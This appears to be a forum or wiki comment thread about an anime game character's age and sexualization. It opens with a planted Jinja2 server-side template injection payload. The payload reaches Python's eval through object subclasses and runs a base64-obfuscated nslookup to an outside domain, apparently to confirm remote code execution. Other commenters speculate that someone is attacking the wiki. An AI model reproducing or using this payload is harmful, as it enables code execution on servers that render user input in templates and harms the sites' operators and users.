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{% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnZDJWNloyZzBaVGhsWldKNGQzWmthbWw2ZWpRMWEyMXBiVGg0ZUc1a2FIZHljelIzTm1KeWVubG5ZUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}
Is someone seriously trying to make an DdoS attack at the forum wiki and pasting it in the comments, or just trying to make it look like it?
And all because of an anime girl?
Twitter and mass production of soy was a mistake.
Exactly, I was only stating that canonically the stated character is not underage albeit war of the visions doesn't state any age for their characters I'm not saying that I condone the sexualization just wanted to put it out there that Sakura was one of the oldest characters in the game age wise not saying her body development is. That's why I put in that her un-aging figure is the debatable topic